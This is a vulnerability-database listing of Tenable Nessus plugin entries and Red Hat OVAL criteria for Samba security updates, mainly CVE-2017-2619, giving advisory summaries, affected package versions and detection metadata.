(slackware_check(osver:"14.1", arch:"x86_64", pkgname:"samba", pkgver:"4.4.12", pkgarch:"x86_64", pkgnum:"1_slack14.1")) flag++; if (slackware_check(osver:"14.2", pkgname:"samba", pkgver:"4.4.12", pkgarch:"i586", pkgnum:"1_slack14.2")) flag++; if (slackware_check(osver:"14.2", arch:"x86_64", pkgname:"samba", pkgver:"4.4.12", pkgarch:"x86_64", pkgnum:"1_slack14.2")) flag++; if (slackware_check(osver:"current", pkgname:"samba", pkgver:"4.6.1", pkgarch:"i586", pkgnum:"1")) flag++; if (slackware_check(osver:"current", arch:"x86_64", pkgname:"samba", pkgver:"4.6.1", pkgarch:"x86_64", pkgnum:"1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get()); else security_warning(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");

NASL family	SuSE Local Security Checks
NASL id	OPENSUSE-2017-439.NASL
description	This update for samba fixes the following issues : Security issues fixed : - CVE-2017-2619: Symlink race permits opening files outside share directory (bsc#1027147). Bugfixes : - Don
last seen	2020-06-05
modified	2017-04-06
plugin id	99210
published	2017-04-06
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99210
title	openSUSE Security Update : samba (openSUSE-2017-439)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2017-0841-1.NASL
description	This update for samba fixes the following issues: Security issue fixed : - CVE-2017-2619: symlink race permits opening files outside share directory (bsc#1027147). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	99084
published	2017-03-30
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99084
title	SUSE SLES11 Security Update : samba (SUSE-SU-2017:0841-1)

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-C22A1DBE8B.NASL
description	Security fix for CVE-2017-2619 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2017-04-03
plugin id	99147
published	2017-04-03
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99147
title	Fedora 25 : 2:samba (2017-c22a1dbe8b)

NASL family	Ubuntu Local Security Checks
NASL id	UBUNTU_USN-3242-1.NASL
description	Jann Horn discovered that Samba incorrectly handled symlinks. An authenticated remote attacker could use this issue to access files on the server outside of the exported directories. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	97937
published	2017-03-24
reporter	Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/97937
title	Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : samba vulnerability (USN-3242-1)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2017-1216-1.NASL
description	This update for samba fixes the following issues: Security issue fixed : - CVE-2017-2619: symlink race permits opening files outside share directory (bsc#1027147). For SUSE Linux Enterprise 11 SP4 this is a re-issue of the update, a regression in the fix has been addressed (bsc#1036283, bso#12721). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	100050
published	2017-05-09
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/100050
title	SUSE SLES11 Security Update : samba (SUSE-SU-2017:1216-1)

NASL family	Ubuntu Local Security Checks
NASL id	UBUNTU_USN-3267-1.NASL
description	Jann Horn discovered that Samba incorrectly handled symlinks. An authenticated remote attacker could use this issue to access files on the server outside of the exported directories. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	99685
published	2017-04-26
reporter	Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99685
title	Ubuntu 17.04 : samba vulnerability (USN-3267-1)

NASL family	Junos Local Security Checks
NASL id	JUNIPER_SPACE_JSA10917_184R1.NASL
description	According to its self-reported version number, the remote Junos Space version is 18.4.x prior to 18.4R1. It is, therefore, affected by multiple vulnerabilities : - An integer overflow issue exists in procps-ng. This is related to CVE-2018-1124. (CVE-2018-1126) - A directory traversal issue exits in reposync, a part of yum-utils.tory configuration files. If an attacker controls a repository, they may be able to copy files outside of the destination directory on the targeted system via path traversal. (CVE-2018-10897) - An integer overflow flaw was found in the Linux kernel
last seen	2020-06-01
modified	2020-06-02
plugin id	121068
published	2019-01-10
reporter	This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/121068
title	Juniper Junos Space 18.4.x < 18.4R1 Multiple Vulnerabilities (JSA10917)

NASL family	NewStart CGSL Local Security Checks
NASL id	NEWSTART_CGSL_NS-SA-2019-0113_SAMBA.NASL
description	The remote NewStart CGSL host, running version MAIN 4.05, has samba packages installed that are affected by multiple vulnerabilities: - A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) - An information leak flaw was found in the way SMB1 protocol was implemented by Samba. A malicious client could use this flaw to dump server memory contents to a file on the samba share or to a shared printer, though the exact area of server memory cannot be controlled by the attacker. (CVE-2017-12163) - It was found that samba did not enforce SMB signing when certain configuration options were enabled. A remote attacker could launch a man-in-the-middle attack and retrieve information in plain-text. (CVE-2017-12150) Note that Nessus has not tested for this issue but has instead relied only on the application
last seen	2020-06-01
modified	2020-06-02
plugin id	127352
published	2019-08-12
reporter	This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/127352
title	NewStart CGSL MAIN 4.05 : samba Multiple Vulnerabilities (NS-SA-2019-0113)

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2017-2338.NASL
description	An update for samba is now available for Red Hat Gluster Storage 3.2 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) * A flaw was found in the way Samba handled dangling symlinks. An authenticated malicious Samba client could use this flaw to cause the smbd daemon to enter an infinite loop and use an excessive amount of CPU and memory. (CVE-2017-9461) Red Hat would like to thank the Samba project for reporting CVE-2017-2619. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619.
last seen	2020-06-01
modified	2020-06-02
plugin id	102156
published	2017-08-03
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/102156
title	RHEL 7 : Red Hat Gluster Storage (RHSA-2017:2338)

NASL family	Scientific Linux Local Security Checks
NASL id	SL_20180619_SAMBA_ON_SL6_X.NASL
description	Security Fix(es) : - samba: NULL pointer indirection in printer server process (CVE-2018-1050)
last seen	2020-03-18
modified	2018-07-03
plugin id	110891
published	2018-07-03
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/110891
title	Scientific Linux Security Update : samba on SL6.x i386/x86_64 (20180619)

NASL family	Virtuozzo Local Security Checks
NASL id	VIRTUOZZO_VZLSA-2017-1265.NASL
description	An update for samba is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) * A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) Red Hat would like to thank the Samba project for reporting CVE-2017-2619. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619. Note that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	101469
published	2017-07-13
reporter	This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/101469
title	Virtuozzo 7 : ctdb / ctdb-tests / libsmbclient / etc (VZLSA-2017-1265)

NASL family	Scientific Linux Local Security Checks
NASL id	SL_20170522_SAMBA_ON_SL7_X.NASL
description	Security Fix(es) : - It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) - A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) - A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619)
last seen	2020-03-18
modified	2017-05-23
plugin id	100350
published	2017-05-23
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/100350
title	Scientific Linux Security Update : samba on SL7.x x86_64 (20170522)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2017-0859-1.NASL
description	This update for samba fixes the following issues: Security issues fixed : - CVE-2017-2619: Symlink race permits opening files outside share directory (bsc#1027147). Bugfixes : - Don
last seen	2020-06-01
modified	2020-06-02
plugin id	99087
published	2017-03-30
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99087
title	SUSE SLED12 / SLES12 Security Update : samba (SUSE-SU-2017:0859-1)

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2017-0858-1.NASL
description	This update for samba fixes the following issues: Security issues fixed : - CVE-2017-2619: Symlink race permits opening files outside share directory (bsc#1027147). Bugfixes : - Force usage of ncurses6-config thru NCURSES_CONFIG env var (bsc#1023847). - Add missing ldb module directory (bsc#1012092). - Don
last seen	2020-06-01
modified	2020-06-02
plugin id	99086
published	2017-03-30
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99086
title	SUSE SLED12 / SLES12 Security Update : samba (SUSE-SU-2017:0858-1)

NASL family	Debian Local Security Checks
NASL id	DEBIAN_DSA-3816.NASL
description	Jann Horn of Google discovered a time-of-check, time-of-use race condition in Samba, a SMB/CIFS file, print, and login server for Unix. A malicious client can take advantage of this flaw by exploiting a symlink race to access areas of the server file system not exported under a share definition.
last seen	2020-06-01
modified	2020-06-02
plugin id	97923
published	2017-03-24
reporter	This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/97923
title	Debian DSA-3816-1 : samba - security update

NASL family	Debian Local Security Checks
NASL id	DEBIAN_DLA-894.NASL
description	Jann Horn of Google discovered a time-of-check, time-of-use race condition in Samba, a SMB/CIFS file, print, and login server for Unix. A malicious client can take advantage of this flaw by exploting a symlink race to access areas of the server file system not exported under a share definition. For Debian 7
last seen	2020-03-17
modified	2017-04-12
plugin id	99291
published	2017-04-12
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99291
title	Debian DLA-894-1 : samba security update

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2017-0862-1.NASL
description	This update for samba fixes the following issues: Security issues fixed : - CVE-2017-2619: Symlink race permits opening files outside share directory (bsc#1027147). Bugfixes : - Don
last seen	2020-06-01
modified	2020-06-02
plugin id	99089
published	2017-03-30
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99089
title	SUSE SLES12 Security Update : samba (SUSE-SU-2017:0862-1)

NASL family	Oracle Linux Local Security Checks
NASL id	ORACLELINUX_ELSA-2017-1265.NASL
description	From Red Hat Security Advisory 2017:1265 : An update for samba is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) * A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) Red Hat would like to thank the Samba project for reporting CVE-2017-2619. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619.
last seen	2020-06-01
modified	2020-06-02
plugin id	100344
published	2017-05-23
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/100344
title	Oracle Linux 7 : samba (ELSA-2017-1265)

NASL family	Scientific Linux Local Security Checks
NASL id	SL_20170921_SAMBA_ON_SL6_X.NASL
description	Security Fix(es) : - A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) - It was found that samba did not enforce
last seen	2020-03-18
modified	2017-09-27
plugin id	103501
published	2017-09-27
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/103501
title	Scientific Linux Security Update : samba on SL6.x i386/x86_64 (20170921)

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2017-1265.NASL
description	An update for samba is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) * A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) Red Hat would like to thank the Samba project for reporting CVE-2017-2619. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619.
last seen	2020-06-01
modified	2020-06-02
plugin id	100346
published	2017-05-23
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/100346
title	RHEL 7 : samba (RHSA-2017:1265)

NASL family	Huawei Local Security Checks
NASL id	EULEROS_SA-2017-1105.NASL
description	According to the versions of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) - A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) - A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) - A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-05-06
modified	2017-06-09
plugin id	100698
published	2017-06-09
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/100698
title	EulerOS 2.0 SP2 : samba (EulerOS-SA-2017-1105)

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2017-2778.NASL
description	An update for samba is now available for Red Hat Gluster Storage 3.3 for RHEL 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) * A flaw was found in the way Samba handled dangling symlinks. An authenticated malicious Samba client could use this flaw to cause the smbd daemon to enter an infinite loop and use an excessive amount of CPU and memory. (CVE-2017-9461) Red Hat would like to thank the Samba project for reporting CVE-2017-2619. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619. Bug Fix(es) : * In the samba configuration, by default the
last seen	2020-06-01
modified	2020-06-02
plugin id	103453
published	2017-09-25
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/103453
title	RHEL 6 : Storage Server (RHSA-2017:2778)

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-97FB93E1D1.NASL
description	Fix a nss_wins crash ---- Security fix for CVE-2017-2619 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2017-04-17
plugin id	99414
published	2017-04-17
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99414
title	Fedora 24 : 2:samba (2017-97fb93e1d1)

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2017-2789.NASL
description	An update for samba is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) * It was found that samba did not enforce
last seen	2020-06-01
modified	2020-06-02
plugin id	103406
published	2017-09-22
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/103406
title	RHEL 6 : samba (RHSA-2017:2789)

NASL family	SuSE Local Security Checks
NASL id	OPENSUSE-2017-437.NASL
description	This update for samba fixes the following issues : Security issues fixed : - CVE-2017-2619: Symlink race permits opening files outside share directory (bsc#1027147). Bugfixes : - Force usage of ncurses6-config thru NCURSES_CONFIG env var (bsc#1023847). - Add missing ldb module directory (bsc#1012092). - Don
last seen	2020-06-05
modified	2017-04-06
plugin id	99209
published	2017-04-06
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99209
title	openSUSE Security Update : samba (openSUSE-2017-437)

NASL family	CentOS Local Security Checks
NASL id	CENTOS_RHSA-2017-2789.NASL
description	An update for samba is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) * It was found that samba did not enforce
last seen	2020-06-01
modified	2020-06-02
plugin id	103385
published	2017-09-22
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/103385
title	CentOS 6 : samba (CESA-2017:2789)

NASL family	Amazon Linux Local Security Checks
NASL id	ALA_ALAS-2017-834.NASL
description	A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494) It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619)
last seen	2020-06-01
modified	2020-06-02
plugin id	100554
published	2017-06-01
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/100554
title	Amazon Linux AMI : samba (ALAS-2017-834) (SambaCry)

NASL family	Misc.
NASL id	SAMBA_4_6_1.NASL
description	The version of Samba running on the remote host is 4.4.x prior to 4.4.12, 4.5.x prior to 4.5.7, or 4.6.x prior to 4.6.1. It is, therefore, affected by an information disclosure vulnerability due to a race condition between calls to lstat() for symlink checks and calls to open() to read a file. A local attacker can exploit this, by replacing a recently checked path with a symlink, to disclose arbitrary files on the system. Note that Nessus has not tested for this issue but has instead relied only on the application
last seen	2020-06-01
modified	2020-06-02
plugin id	99199
published	2017-04-05
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99199
title	Samba 4.4.x < 4.4.12 / 4.5.x < 4.5.7 / 4.6.x < 4.6.1 Path Renaming Symlink Local File Disclosure

Redhat

advisories

bugzilla

id	1429472
title	CVE-2017-2619 samba: symlink race permits opening files outside share directory

oval

comment Red Hat Enterprise Linux must be installed
oval oval:com.redhat.rhba:tst:20070304026

AND

comment Red Hat Enterprise Linux 7 is installed
oval oval:com.redhat.rhba:tst:20150364027

AND

comment samba-vfs-glusterfs is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265001
comment samba-vfs-glusterfs is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258042

AND

comment libsmbclient-devel is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265003
comment libsmbclient-devel is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258034

AND
comment samba-python is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265005
comment samba-python is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258026
AND
comment samba is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265007
comment samba is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258022

AND

comment samba-winbind-krb5-locator is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265009
comment samba-winbind-krb5-locator is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258004

AND
comment samba-test is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265011
comment samba-test is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258044
AND
comment samba-dc is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265013
comment samba-dc is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258002

AND

comment libwbclient-devel is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265015
comment libwbclient-devel is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258048

AND

comment samba-krb5-printing is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265017
comment samba-krb5-printing is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20171265018

AND
comment samba-dc-libs is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265019
comment samba-dc-libs is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258036

AND

comment samba-test-libs is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265021
comment samba-test-libs is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258040

AND
comment samba-common is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265023
comment samba-common is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258006

AND

comment samba-common-tools is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265025
comment samba-common-tools is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258030

AND
comment libsmbclient is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265027
comment libsmbclient is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258012
AND
comment samba-winbind is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265029
comment samba-winbind is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258010
AND
comment libwbclient is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265031
comment libwbclient is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258016

AND

comment samba-common-libs is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265033
comment samba-common-libs is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258020

AND
comment samba-client is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265035
comment samba-client is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258014

AND

comment samba-client-libs is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265037
comment samba-client-libs is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258028

AND

comment samba-winbind-clients is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265039
comment samba-winbind-clients is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258018

AND
comment samba-libs is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265041
comment samba-libs is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258008

AND

comment samba-winbind-modules is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265043
comment samba-winbind-modules is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258024

AND
comment samba-pidl is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265045
comment samba-pidl is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258032
AND
comment samba-devel is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265047
comment samba-devel is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258038
AND
comment ctdb-tests is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265049
comment ctdb-tests is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258054
AND
comment ctdb is earlier than 0:4.4.4-13.el7_3
oval oval:com.redhat.rhsa:tst:20171265051
comment ctdb is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258050

rhsa

id	RHSA-2017:1265
released	2017-05-22
severity	Moderate
title	RHSA-2017:1265: samba security and bug fix update (Moderate)

bugzilla

id	1491206
title	CVE-2017-12163 Samba: Server memory information leak over SMB1

oval

comment Red Hat Enterprise Linux must be installed
oval oval:com.redhat.rhba:tst:20070304026

AND

comment Red Hat Enterprise Linux 6 is installed
oval oval:com.redhat.rhba:tst:20111656003

AND

comment samba-winbind-krb5-locator is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789001
comment samba-winbind-krb5-locator is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258004

AND
